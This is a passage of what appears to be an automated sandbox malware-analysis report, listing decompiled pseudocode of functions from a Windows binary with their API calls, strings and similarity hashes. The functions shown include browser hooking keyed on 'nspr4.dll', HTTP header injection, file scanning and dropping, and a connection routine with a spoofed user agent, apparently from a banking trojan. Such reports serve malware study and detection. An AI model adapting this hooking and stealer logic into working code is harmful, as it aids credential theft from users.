						 *((intOrPtr*)( *((intOrPtr*)( *_t62 + 8))))(_t62,  &_v1008,  &_v1096);
					}
				}
				_t18 =  &_v1088; // 0x403954
				_t36 =  *_t18;
				 *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))(_t36);
				goto L8;
			}

0x0041f4be
0x0041f4da
0x0041f4e2
0x0041f4e6
0x0041f5d8
0x0041f5dd
0x0041f5dd
0x0041f4ec
0x0041f4f2
0x00000000
0x00000000
0x0041f4f8
0x0041f4f9
0x0041f502
0x0041f503
0x0041f508
0x0041f588
0x0041f58a
0x0041f58e
0x0041f590
0x0041f594
0x0041f598
0x0041f59e
0x0041f5ae
0x0041f5b5
0x0041f5c4
0x0041f5c4
0x0041f5d2
0x0041f5d2
0x00000000
0x0041f598
0x0041f50f
0x0041f519
0x0041f51d
0x00000000
0x00000000
0x0041f51f
0x0041f527
0x0041f528
0x0041f52d
0x0041f532
0x0041f534
0x0041f53d
0x0041f53f
0x0041f545
0x0041f55d
0x0041f55f
0x0041f567
0x0041f56f
0x0041f57a
0x0041f57a
0x0041f545
0x0041f57c
0x0041f57c
0x0041f586
0x00000000

APIs

CoCreateInstance.OLE32 ref: 0041F4E2
CoCreateInstance.OLE32(00403914,00000000,00004401,00403924,00004401), ref: 0041F539
HeapFree.KERNEL32(?,00000000,?), ref: 0041F5D2

Strings

T9@, xrefs: 0041F50F, 0041F57C, 0041F513, 0041F585
D, xrefs: 0041F55F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance$FreeHeap
String ID: D$T9@
API String ID: 2709810982-1475115963
Opcode ID: a43a38136b82de879791f632eebdeacccadc94f65f88175787f179a4a3c2c8c0
Instruction ID: 7a6da8828539e897b71298a9f600d4cbc73281b2688f0174425e4c7ab50b50d8
Opcode Fuzzy Hash: a43a38136b82de879791f632eebdeacccadc94f65f88175787f179a4a3c2c8c0
Instruction Fuzzy Hash: 56318071204301ABD714DF19CC45FABB7E9ABC8704F10852DF64897290DB74ED46CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00423B70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00423B70(signed char _a4) {
				void* _v0;
				short _v520;
				intOrPtr _v524;
				void* _v528;
				void* _v556;
				void* _v564;
				char _v572;
				char _v573;
				void* _v577;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t22;
				void* _t39;
				WCHAR* _t47;
				void* _t48;
				void* _t50;
				void* _t51;

				_v573 = 0;
				_t50 = E00423A90();
				_t52 = _t50;
				if(_t50 == 0) {
					return 0;
				} else {
					_t48 = _t50;
					if(E00418CD0(_t52,  &_v572) != 0) {
						_t22 = _v572;
						if(_t22 > 0x2020000 || _a4 == 1 && _t22 >= 0x2020000) {
							if(E00418BD0(0x4e22, 0x10000000, _t48) != 0) {
								_t39 = E00418C20(_t23);
								if(_t39 != 0) {
									_t47 =  &_v520;
									if(E004181D0(_t47, ?str?) != 0) {
										_t49 = _t51 + 0x18;
										E0041CC70(_t51 + 0x18);
										 *((intOrPtr*)(_t51 + 0x24)) =  *0x42edbc;
										 *(_t51 + 0x2c) = _t39;
										_v524 = _t47;
										if(E004133B0(_t49, 0) != 0) {
											asm("sbb eax, eax");
											if(E00412BF0( ~(_a4 & 0x000000ff) & 0x00403984, _t47, 0, 0, 0) != 0) {
												_v573 = 1;
											}
										}
										SetFileAttributesW( &_v520, 0x80);
										DeleteFileW( &_v520);
									}
									HeapFree( *0x42e6d4, 0, _t39);
								}
							}
						}
					}
					HeapFree( *0x42e6d4, 0, _t50);
					return _v573;
				}
			}

0x00423b7c
0x00423b85
0x00423b87
0x00423b89
0x00423ca9
0x00423b8f
0x00423b94
0x00423b9d
0x00423ba3
0x00423bac
0x00423bd8
0x00423be5
0x00423be9
0x00423bf4
0x00423bff
0x00423c01
0x00423c05
0x00423c16
0x00423c1a
0x00423c1e
0x00423c29
0x00423c39
0x00423c4b
0x00423c4d
0x00423c4d
0x00423c4b
0x00423c5c
0x00423c67
0x00423c67
0x00423c77
0x00423c77
0x00423be9
0x00423bd8
0x00423bac
0x00423c86
0x00423c9a
0x00423c9a

APIs

Part of subcall function 00423A90: RegOpenKeyExW.ADVAPI32(80000001), ref: 00423AD6
Part of subcall function 00423A90: HeapFree.KERNEL32(?,00000000,?,00000001,?), ref: 00423B17

SetFileAttributesW.KERNEL32(?,00000080,00000000,exe,?,10000000,?,?,00000001), ref: 00423C5C
DeleteFileW.KERNEL32(?), ref: 00423C67
HeapFree.KERNEL32(?,00000000,00000000,exe,?,10000000,?,?,00000001), ref: 00423C77
HeapFree.KERNEL32(?,00000000,00000000,?,10000000,?,?,00000001), ref: 00423C86

Strings

exe, xrefs: 00423BEF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$File$AttributesDeleteOpen
String ID: exe
API String ID: 1836167533-1801697008
Opcode ID: aeb44346a91935ba3ead5d5845104ac06464093365e5f8813fedc1d9daa53d3b
Instruction ID: 55b7f55bf01f0243d781b9387340562a74aa303d5ec605879d63c545876d9078
Opcode Fuzzy Hash: aeb44346a91935ba3ead5d5845104ac06464093365e5f8813fedc1d9daa53d3b
Instruction Fuzzy Hash: 3C313A323043501AD3209F26AD49BABB7A99B85345F84083FBE80AB291DA7DD949C75D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D210, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D210(signed int __ebx, WCHAR* __edi) {
				char _v668;
				char _v796;
				char _v1056;
				char _v1106;
				char _v1126;
				char _v1146;
				char _v1556;
				short _v1644;
				WCHAR* __esi;
				short _t22;
				signed int _t25;
				WCHAR* _t34;
				short* _t40;

				_t34 = __edi;
				_t25 = __ebx;
				_t40 =  &_v1644;
				 *__edi = 0;
				E0041D150( &_v796);
				_t31 =  &_v1056;
				E00410820( &_v1056,  &_v668, 0x102);
				_t22 = E00412640(_t31, E00410820( &_v1556, 0x42eb80, 0x1e6), 0x1e6);
				if(__ebx > 3) {
					L20:
					return _t22;
				} else {
					switch( *((intOrPtr*)(__ebx * 4 +  &M0041D324))) {
						case 0:
							__esi = 0x42e958;
							__eax =  &_v1126;
							goto L5;
						case 1:
							_t23 =  &_v1146;
							goto L5;
						case 2:
							__esi = L"SOFTWARE\\Microsoft";
							__eax =  &_v1106;
							L5:
							_t28 = 0;
							if(_t23 != 0 &&  *_t23 != 0) {
								do {
									_t28 = _t28 + 1;
								} while (_t23[_t28] != 0);
							}
							_t22 = MultiByteToWideChar(0, 0, _t23, _t28,  &_v1644, 0x32);
							if(_t22 >= 0x32) {
								_t22 = 0;
							}
							 *((short*)(_t40 + 4 + _t22 * 2)) = 0;
							if(_t22 == 0) {
								goto L20;
							} else {
								_t30 =  &_v1644;
								while(1) {
									_t24 =  *_t30 & 0x0000ffff;
									if(_t24 != 0x5c && _t24 != 0x2f) {
										break;
									}
									_t30 =  &(_t30[1]);
								}
								_t22 = PathCombineW(_t34, 0x42e958, _t30);
								if(_t22 != 0) {
									if(_t25 == 0) {
										_t22 = PathRenameExtensionW(_t34, L".dat");
										if(_t22 == 0) {
											 *_t34 = _t22;
										}
									}
									goto L20;
								} else {
									 *_t34 = 0;
									return _t22;
								}
							}
							goto L21;
					}
				}
				L21:
			}

0x0041d210
0x0041d210
0x0041d212
0x0041d218
0x0041d223
0x0041d235
0x0041d23d
0x0041d260
0x0041d268
0x0041d31a
0x0041d321
0x0041d26e
0x0041d26e
0x00000000
0x0041d283
0x0041d288
0x00000000
0x00000000
0x0041d27a
0x00000000
0x00000000
0x0041d291
0x0041d296
0x0041d29d
0x0041d29d
0x0041d2a1
0x0041d2a7
0x0041d2a7
0x0041d2a8
0x0041d2a7
0x0041d2bb
0x0041d2c4
0x0041d2c6
0x0041d2c6
0x0041d2ca
0x0041d2d1
0x00000000
0x0041d2d3
0x0041d2d3
0x0041d2d7
0x0041d2d7
0x0041d2dd
0x00000000
0x00000000
0x0041d2e4
0x0041d2e4
0x0041d2ec
0x0041d2f4
0x0041d305
0x0041d30d
0x0041d315
0x0041d317
0x0041d317
0x0041d315
0x00000000
0x0041d2f6
0x0041d2f8
0x0041d302
0x0041d302
0x0041d2f4
0x00000000
0x00000000
0x0041d26e
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000102,00000032,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041D2BB
PathCombineW.SHLWAPI(?,0042E958,?), ref: 0041D2EC
PathRenameExtensionW.SHLWAPI(?,.dat), ref: 0041D30D

Strings

.dat, xrefs: 0041D307
SOFTWARE\Microsoft, xrefs: 0041D291

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ByteCharCombineExtensionMultiRenameWide
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3133001891-47915998
Opcode ID: 7ecb7d4943af6973b06284ae6a97bbfde9274b8705e4f6f5ce95a3ba96ab3934
Instruction ID: df229da979e20e8d115c7300bb258489577514de700eb6c184516c4853c9e617
Opcode Fuzzy Hash: 7ecb7d4943af6973b06284ae6a97bbfde9274b8705e4f6f5ce95a3ba96ab3934
Instruction Fuzzy Hash: 8A2105B0A0825156E724DB21DC86BFB33A89F81700F40487FF895D6190E37CD9C2825F

Uniqueness

Uniqueness Score: -1.00%

Function 00422650, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00422650(void* __eflags) {
				char _v680;
				char _v1180;
				char _v1200;
				char _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				char _v1236;
				char _v1248;
				intOrPtr _v1252;
				void* _v1256;
				void* __esi;
				void* _t22;
				intOrPtr* _t39;
				void* _t40;
				char* _t41;
				signed int _t42;
				void* _t44;

				_t44 =  &_v1236;
				_t41 =  &_v1212;
				E00424100(0x95, _t41);
				_v1224 = 0x26;
				_v1220 = 0x1a;
				_v1216 = 0x23;
				_v1228 = _t41;
				E00410870(_t41,  &_v1236, 0, 8);
				_t39 = __imp__SHGetFolderPathW;
				_t42 = 0;
				do {
					_push( &_v1180);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t44 + 0x14 + _t42 * 4)));
					_push(0);
					if( *_t39() == 0) {
						E00418700( &_v1200,  &_v1248, 1, 2, E00422370,  &_v1256, _t21, _t21, _t21);
					}
					_t42 = _t42 + 1;
				} while (_t42 < 3);
				_t22 = _v1256;
				if(_v1252 <= 0) {
					if(_t22 != 0) {
						return HeapFree( *0x42e6d4, 0, _t22);
					}
					goto L11;
				} else {
					_t40 = _t22;
					if(_t22 == 0) {
						L11:
						return _t22;
					} else {
						if( *_t22 != 0) {
							E00424100(0x96,  &_v680);
							E0040D880(_t40, 0xcb,  &_v680);
						}
						return HeapFree( *0x42e6d4, 0, _t40);
					}
				}
			}

0x00422650
0x00422658
0x00422661
0x00422671
0x00422679
0x00422681
0x00422689
0x0042268d
0x00422692
0x00422698
0x004226a0
0x004226a8
0x004226a9
0x004226ab
0x004226ad
0x004226ae
0x004226b4
0x004226cf
0x004226cf
0x004226d4
0x004226d5
0x004226df
0x004226e3
0x0042272b
0x00000000
0x00422737
0x00000000
0x004226e5
0x004226e5
0x004226e9
0x00422745
0x00422745
0x004226eb
0x004226ef
0x004226fd
0x0042270c
0x0042270c
0x00422728
0x00422728
0x004226e9

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 004226B0
HeapFree.KERNEL32(?,00000000,?), ref: 0042271A

Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
Part of subcall function 00418700: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
Part of subcall function 00418700: WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
Part of subcall function 00418700: PathMatchSpecW.SHLWAPI(?), ref: 004187DD
Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844

HeapFree.KERNEL32(?,00000000,?), ref: 00422737

Strings

#, xrefs: 00422681
&, xrefs: 00422671

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineFreeHeap$FileFindFirstFolderMatchObjectSingleSpecWait
String ID: #$&
API String ID: 1191416533-3870246384
Opcode ID: b1384ef16326ac4f335d7948c6ade10623f007c846c448b719b30173d7b99bbd
Instruction ID: 1feac3dd11a70a099613fb7fc16dc8a34dfdbd0b83bbb61d95b109450f73998d
Opcode Fuzzy Hash: b1384ef16326ac4f335d7948c6ade10623f007c846c448b719b30173d7b99bbd
Instruction Fuzzy Hash: FD21C475704310ABE324DB15ED45FABB7A8EBC4704F80452DFA44AB2D0D7B8D905CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00421AD0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00421AD0(void* __eflags) {
				char _v680;
				char _v1180;
				char _v1200;
				char _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				char _v1228;
				char _v1240;
				intOrPtr _v1244;
				void* _v1248;
				void* __esi;
				void* _t22;
				intOrPtr* _t39;
				void* _t40;
				char* _t41;
				signed int _t42;
				void* _t44;

				_t44 =  &_v1228;
				_t41 =  &_v1204;
				E00424100(0x81, _t41);
				_v1216 = 0x26;
				_v1212 = 0x1a;
				_v1208 = 0x23;
				_v1220 = _t41;
				E00410870(_t41,  &_v1228, 0, 8);
				_t39 = __imp__SHGetFolderPathW;
				_t42 = 0;
				do {
					_push( &_v1180);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t44 + 0x14 + _t42 * 4)));
					_push(0);
					if( *_t39() == 0) {
						E00418700( &_v1200,  &_v1240, 1, 2, E00421750,  &_v1248, _t21, _t21, _t21);
					}
					_t42 = _t42 + 1;
				} while (_t42 < 3);
				_t22 = _v1248;
				if(_v1244 <= 0) {
					if(_t22 != 0) {
						return HeapFree( *0x42e6d4, 0, _t22);
					}
					goto L11;
				} else {
					_t40 = _t22;
					if(_t22 == 0) {
						L11:
						return _t22;
					} else {
						if( *_t22 != 0) {
							E00424100(0x82,  &_v680);
							E0040D880(_t40, 0xcb,  &_v680);
						}
						return HeapFree( *0x42e6d4, 0, _t40);
					}
				}
			}

0x00421ad0
0x00421ad8
0x00421ae1
0x00421af1
0x00421af9
0x00421b01
0x00421b09
0x00421b0d
0x00421b12
0x00421b18
0x00421b20
0x00421b28
0x00421b29
0x00421b2b
0x00421b2d
0x00421b2e
0x00421b34
0x00421b4f
0x00421b4f
0x00421b54
0x00421b55
0x00421b5f
0x00421b63
0x00421bab
0x00000000
0x00421bb7
0x00000000
0x00421b65
0x00421b65
0x00421b69
0x00421bc5
0x00421bc5
0x00421b6b
0x00421b6f
0x00421b7d
0x00421b8c
0x00421b8c
0x00421ba8
0x00421ba8
0x00421b69

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00421B30
HeapFree.KERNEL32(?,00000000,?), ref: 00421B9A

Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
Part of subcall function 00418700: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
Part of subcall function 00418700: WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
Part of subcall function 00418700: PathMatchSpecW.SHLWAPI(?), ref: 004187DD
Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844

HeapFree.KERNEL32(?,00000000,?), ref: 00421BB7

Strings

#, xrefs: 00421B01
&, xrefs: 00421AF1

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineFreeHeap$FileFindFirstFolderMatchObjectSingleSpecWait
String ID: #$&
API String ID: 1191416533-3870246384
Opcode ID: a3ec9968f02915fe9fde2a501de06d4b18fa56ca2b2c83deb9ef46f7f8097ebd
Instruction ID: 32a645155c7d5c0fb8d6a9607b7cbcede0a2e1a20dd084966ebf6fc0228dc7ff
Opcode Fuzzy Hash: a3ec9968f02915fe9fde2a501de06d4b18fa56ca2b2c83deb9ef46f7f8097ebd
Instruction Fuzzy Hash: 452108717003106BE310DB11EC45FAB77A8EBC4704F80452DFA44AB2D0E778E909CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF60, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040BF60(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
				char _v20;
				char _v24;
				char* _v36;
				long _v44;
				long _v48;
				long _v52;
				intOrPtr _v56;
				long _t17;
				struct _GOPHER_FIND_DATAA _t18;
				int _t19;
				char* _t22;
				long _t26;
				void* _t33;

				_t17 = WaitForSingleObject( *0x42edbc, 0);
				_t33 = _a4;
				_t18 = _a8;
				if(_t17 == 0) {
					L8:
					_t19 = HttpSendRequestExA(_t33, _t18, _a12, _a16, _a20);
					L9:
					return _t19;
				}
				_push(0x28);
				if(_t18 != 0) {
					_push(_t18);
					_push( &_v44);
					E00410820();
					_t26 = _v44;
					if(_t26 != 0) {
						_t22 = _v36;
						if(_t22 != 0) {
							HttpAddRequestHeadersA(_t33, _t22, _t26, 0xa0000000);
							_v52 = 0;
							_v48 = 0;
						}
					}
				} else {
					_push(_t18);
					_push( &_v44);
					E00410870(_t18);
					_v56 = 0x28;
				}
				_t19 = E0040BB80(_t33,  &_v24,  &_v20);
				if(_t19 != 0xffffffff) {
					goto L9;
				} else {
					_t18 =  &_v44;
					goto L8;
				}
			}

0x0040bf72
0x0040bf78
0x0040bf7d
0x0040bf80
0x0040bfef
0x0040bffd
0x0040c003
0x0040c007
0x0040c007
0x0040bf82
0x0040bf86
0x0040bf9d
0x0040bfa2
0x0040bfa3
0x0040bfa8
0x0040bfae
0x0040bfb0
0x0040bfb6
0x0040bfc0
0x0040bfc6
0x0040bfce
0x0040bfce
0x0040bfb6
0x0040bf88
0x0040bf88
0x0040bf8d
0x0040bf8e
0x0040bf93
0x0040bf93
0x0040bfe1
0x0040bfe9
0x00000000
0x0040bfeb
0x0040bfeb
0x00000000
0x0040bfeb

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF72
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0040BFC0
HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0040BFFD

Strings

0h`p, xrefs: 0040BFFD
(, xrefs: 0040BF93

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpRequest$HeadersObjectSendSingleWait
String ID: ($0h`p
API String ID: 2328130936-3983267742
Opcode ID: 843c1a46c425855ddf07cbe9c5f777521da0f14382ec25b43a3526682b81fb1b
Instruction ID: 79b4c6d88892c6e39760786b6d84f2bf3a4c42c28baf4107dc6821c9ca581c01
Opcode Fuzzy Hash: 843c1a46c425855ddf07cbe9c5f777521da0f14382ec25b43a3526682b81fb1b
Instruction Fuzzy Hash: C8115E71204306ABD310DF25DC85FBB77ACEB84714F044A2EF855E3290EB74E9058BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
stringsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041A060(intOrPtr _a4, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* __esi;
				void* _t10;
				int _t13;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t20;
				intOrPtr _t21;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr _t27;
				void* _t28;

				if(WaitForSingleObject( *0x42edbc, 0) != 0) {
					_t16 = _a4;
					_t25 = _a16;
					_t21 = _a12;
					_t10 =  *0x42e92c(_t16, 0, _t21, _t25, _t20, _t24, _t28, _t15);
					_t19 = _v8;
					_t17 =  *0x42e928(_t16, _v8, _t21, _t25);
					if(_t10 < 0 && _t17 >= 0 && _t25 != 0 &&  *_t25 != 0 && _t21 != 0) {
						EnterCriticalSection(0x42e6e8);
						if(( *0x42e700 & 0x00000001) == 0) {
							_t27 =  *_t25;
							_t13 = lstrcmpiW( *(_t21 + 4), L"nspr4.dll");
							_t38 = _t13;
							if(_t13 == 0 && E0041E890(_t19, _t27, _t38) != 0) {
								 *0x42e700 =  *0x42e700 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x42e6e8);
					}
					return _t17;
				}
				goto ( *0x42e928);
			}

0x0041a070
0x0041a079
0x0041a07f
0x0041a084
0x0041a08d
0x0041a093
0x0041a0a3
0x0041a0a7
0x0041a0bf
0x0041a0cc
0x0041a0d1
0x0041a0d9
0x0041a0df
0x0041a0e1
0x0041a0ec
0x0041a0ec
0x0041a0e1
0x0041a0f8
0x0041a0f8
0x0041a104
0x0041a104
0x0041a072

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041A068
EnterCriticalSection.KERNEL32(0042E6E8), ref: 0041A0BF
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0041A0D9
LeaveCriticalSection.KERNEL32(0042E6E8), ref: 0041A0F8

Strings

nspr4.dll, xrefs: 0041A0D3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
String ID: nspr4.dll
API String ID: 3081114022-741017701
Opcode ID: 9eb92bac7d7fb09698e0d5e2e7196b6af4cf2bb62582e77341cb89d1357d6971
Instruction ID: e8748a0f8acbad1f1e6bb595dc2e14c2e7af7eac45cd56e6bb82066a0d17b08b
Opcode Fuzzy Hash: 9eb92bac7d7fb09698e0d5e2e7196b6af4cf2bb62582e77341cb89d1357d6971
Instruction Fuzzy Hash: 18119471302311ABD7205F969D48B977FA8AB9DB11F44442AF900B3260D7B8ACD2CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 004266C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004266C0() {
				char _v672;
				char _v800;
				char _v904;
				void _v1008;
				long _v1012;
				void* __esi;
				void* _t12;
				void* _t18;
				void* _t20;
				signed char _t26;
				signed char _t29;
				void* _t32;

				_t12 = GetThreadDesktop(GetCurrentThreadId());
				if(_t12 == 0) {
					L11:
					return _t12;
				} else {
					_t12 = GetUserObjectInformationW(_t12, 2,  &_v1008, 0x64,  &_v1012);
					if(_t12 == 0 || _v1012 != 0x4e) {
						goto L11;
					} else {
						E0041D150( &_v800);
						E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v904, 0);
						_t18 = 0;
						while(1) {
							_t26 =  *((intOrPtr*)(_t32 + _t18 + 0xc));
							_t29 =  *((intOrPtr*)(_t32 + _t18 + 0x74));
							if(_t26 != _t29) {
								break;
							}
							_t18 = _t18 + 1;
							if(_t18 < 0x4c) {
								continue;
							} else {
								L8:
								_t20 = E00426210(0x42eea0, 0);
								if(_t20 == 0) {
									return E004264F0(0x42eea0, 0);
								}
								 *0x42e8f8 =  *0x42e8f8 | 0x00000004;
								return _t20;
							}
							goto L12;
						}
						_t12 = (_t26 & 0x000000ff) - (_t29 & 0x000000ff);
						if(_t12 != 0) {
							goto L11;
						} else {
							goto L8;
						}
					}
				}
				L12:
			}

0x004266ce
0x004266d6
0x00426786
0x00426786
0x004266dc
0x004266eb
0x004266f3
0x00000000
0x00426704
0x0042670b
0x0042672f
0x00426734
0x00426736
0x00426736
0x0042673a
0x00426740
0x00000000
0x00000000
0x00426742
0x00426746
0x00000000
0x00426748
0x00426754
0x0042675b
0x00426762
0x00000000
0x0042677a
0x00426764
0x00426772
0x00426772
0x00000000
0x00426746
0x00426750
0x00426752
0x00000000
0x00000000
0x00000000
0x00000000
0x00426752
0x004266f3
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 004266C7
GetThreadDesktop.USER32(00000000), ref: 004266CE
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 004266EB

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

Strings

pB, xrefs: 0042672A
N, xrefs: 004266F9

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentDesktopFromInformationObjectStringUser
String ID: N$pB
API String ID: 2495445222-1695575743
Opcode ID: c85de0a76ab5d99099db71cbaed297c0f3378f169a33a90399c68f9b908525ac
Instruction ID: e153c85d36fc57acf6613cf7f3524645a274186946a0968ad3724a787040b431
Opcode Fuzzy Hash: c85de0a76ab5d99099db71cbaed297c0f3378f169a33a90399c68f9b908525ac
Instruction Fuzzy Hash: D01136307403215BE720EB65B995BF737AA9BC0308FD1887BF59187290DB3CD808C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00412FC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412FC0(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t9;
				char* _t17;
				void* _t21;
				void* _t24;

				_t17 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t17 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;)";
				}
				_t21 = InternetOpenA(_t17,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t21 == 0) {
					L7:
					_t9 = 0;
				} else {
					_t24 = 0;
					do {
						_t1 = _t24 + 0x42d390; // 0x2
						_t2 = _t24 + 0x42d394; // 0x42d394
						InternetSetOptionA(_t21,  *_t1, _t2, 4);
						_t24 = _t24 + 8;
					} while (_t24 < 0x18);
					_t9 = InternetConnectA(_t21, _v32, _v28, 0, 0, 3, 0, 0);
					if(_t9 == 0) {
						InternetCloseHandle(_t21);
						goto L7;
					}
				}
				return _t9;
			}

0x00412fc0
0x00412fc0
0x00412fc2
0x00412fc4
0x00412fc4
0x00412fdd
0x00412fe1
0x00413033
0x00413033
0x00412fe3
0x00412feb
0x00412ff0
0x00412ff0
0x00412ff8
0x00413001
0x00413003
0x00413006
0x00413020
0x0041302a
0x0041302d
0x00000000
0x0041302d
0x0041302a
0x00413036

APIs

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00412FD7
InternetSetOptionA.WININET(00000000,00000002,0042D394,00000004), ref: 00413001
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00413020
InternetCloseHandle.WININET(00000000), ref: 0041302D

Strings

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;), xrefs: 00412FC4, 00412FD6

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
